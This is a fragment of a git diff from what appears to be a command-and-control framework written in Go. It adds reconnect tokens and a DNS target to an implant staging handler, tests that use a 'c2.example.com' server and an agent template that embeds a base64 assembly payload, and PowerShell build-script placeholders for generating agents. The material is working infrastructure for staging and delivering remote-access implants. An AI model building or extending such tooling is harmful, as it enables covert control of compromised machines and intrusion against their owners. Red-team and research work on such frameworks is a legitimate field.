w.Header().Set("Cache-Control", "no-store") - _ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken}) + _ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget}) } } diff --git a/internal/staging/staging_test.go b/internal/staging/staging_test.go new file mode 100644 index 0000000..1344bca --- /dev/null +++ b/internal/staging/staging_test.go @@ -0,0 +1,67 @@ +package staging + +import ( + "net/http/httptest" + "testing" + "text/template" + "time" +) + +func TestAuthenticateAllowsReconnectTokenAfterEnrollment(t *testing.T) { + store := NewStore(time.Minute) + sess, err := store.Create("c2.example.com", 443, "pin", "10.0.0.10:53") + if err != nil { + t.Fatalf("create session: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil { + t.Fatalf("initial enrollment failed: %v", err) + } + if err := store.Authenticate("", sess.ReconnectToken); err != nil { + t.Fatalf("reconnect failed: %v", err) + } +} + +func TestAuthenticateRejectsReusedEnrollTokenWithoutReconnectToken(t *testing.T) { + store := NewStore(time.Minute) + sess, err := store.Create("c2.example.com", 443, "pin", "") + if err != nil { + t.Fatalf("create session: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil { + t.Fatalf("initial enrollment failed: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, "wrong"); err == nil { + t.Fatal("reused enrollment token without reconnect token should fail") + } +} + +func TestReconnectTokenSurvivesEnrollmentURLTTL(t *testing.T) { + store := NewStore(50 * time.Millisecond) + sess, err := store.Create("c2.example.com", 443, "pin", "") + if err != nil { + t.Fatalf("create session: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil { + t.Fatalf("initial enrollment failed: %v", err) + } + time.Sleep(75 * time.Millisecond) + if err := store.Authenticate("", sess.ReconnectToken); err != nil { + t.Fatalf("reconnect token should survive URL TTL after enrollment: %v", err) + } +} + +func TestAgentHandlerDoesNotHTMLEscapeAssemblyBase64(t *testing.T) { + store := NewStore(time.Minute) + sess, err := store.Create("c2.example.com", 443, "pin", "") + if err != nil { + t.Fatalf("create session: %v", err) + } + tmpl := template.Must(template.New("agent").Parse("{{.AssemblyB64}}")) + r := httptest.NewRequest("GET", "/a/"+sess.ID, nil) + r.SetPathValue("id", sess.ID) + w := httptest.NewRecorder() + AgentHandler(store, tmpl, "AA+/=").ServeHTTP(w, r) + if got := w.Body.String(); got != "AA+/=" { + t.Fatalf("assembly base64 was escaped or changed: %q", got) + } +} diff --git a/tools/build-agent.ps1 b/tools/build-agent.ps1 index eeacaf5..a850ab3 100644 --- a/tools/build-agent.ps1 +++ b/tools/build-agent.ps1 @@ -23,6 +23,8 @@ $template = $template.Replace('{{.Server}}', '__SERVER__') $template = $template.Replace('{{.Port}}', '443') $template = $template.Replace('{{.CertPin}}', '__CERT_PIN__') $template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__') +$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__') +$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__') [IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8) Write-Host "Wrote $OutFile" Write-Host "Wrote $b64Out"